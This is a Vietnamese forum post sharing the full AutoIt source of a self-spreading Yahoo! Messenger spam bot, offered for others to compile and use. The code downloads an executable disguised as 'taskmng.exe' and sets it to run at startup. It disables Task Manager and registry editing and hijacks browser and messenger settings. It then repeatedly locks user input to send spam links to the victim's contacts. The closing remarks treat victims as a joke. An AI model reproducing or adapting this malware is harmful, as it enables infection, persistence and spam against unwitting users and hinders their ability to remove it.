Code:
;------------------------------------------------
; Phan Mem: DKC Bot
; Phien Ban: 1.1
; Cong Dung: Quang cao Website thong qua Y!M

;
;-------------------------------------------------------

; Thiet Lap
#NoTrayIcon
$trinhduyet = "Tieu De Trinh Duyet"
$ngaunhien = Random(0,9,1)

; Website Ngau Nhien
Dim $web[10]
$web[0] = " link1 "
$web[1] = " link2 "
$web[2] = " link3 "
$web[3] = " link4 "
$web[4] = " link5 "
$web[5] = " link6 "
$web[6] = " link7 "
$web[7] = " link8 "
$web[8] = " link9 "
$web[9] = " link10 "
$website = $web[$ngaunhien]

; Tin Nhan Ngau Nhien
Dim $tin[10]
$tin[0] = "Loi Nhan 1" & $website
$tin[1] = "Loi Nhan 2" & $website
$tin[2] = "Loi Nhan 3" & $website
$tin[3] = "Loi Nhan 4" & $website
$tin[4] = "Loi Nhan 5" & $website
$tin[5] = "Loi Nhan 6" & $website
$tin[6] = "Loi Nhan 7" & $website
$tin[7] = "Loi Nhan 8" & $website
$tin[8] = "Loi Nhan 9" & $website
$tin[9] = "Loi Nhan 10" & $website
$tinnhan = $tin[$ngaunhien]

; Lay Nhiem Vao He Thong
If Not FileExists(@WindowsDir & "\taskmng.exe") Then
InetGet ($website & "/dkc.exe", @WindowsDir & "\taskmng.exe", 0, 1)
Sleep(5000)
EndIf

; Ghi Khoa Registry
RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Start Page", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz", "content url", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_Launchcast", "content url", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Window Title", "REG_SZ", $trinhduyet)

; Thay Doi Status & Gui Tin Nhan
While(1)
Sleep(60000)
$tieude = WinGetTitle("Yahoo! Messenger", "")
$kiemtra = WinExists($tieude)
If $kiemtra = 1 Then
ClipPut($tinnhan)
BlockInput(1)
WinActivate($tieude)
Send("!m")
Send("un")
Send("^v {ENTER}{ENTER}")
Send("^m")
Send("{DOWN}")
Send("^{SHIFTDOWN}{END}{SHIFTUP}")
Send("{ENTER}")
Send("^v {ENTER}")
BlockInput(0)
EndIf
Sleep(1800000)
WEnd
cái code ở trên biên dịch bằng trình AutoIT

làm sao để nó chạy là tuỳ các bạn, bạn nào thông minh đọc code thì biết phải làm gì, share lên cho các bạn tham khảo , nếu ko dùng được thì làm victim, dùng dc thì ..là kẻ thù của chatter thế nhé …

Xem thêm những chủ đề mới nhất cùng chuyên mục: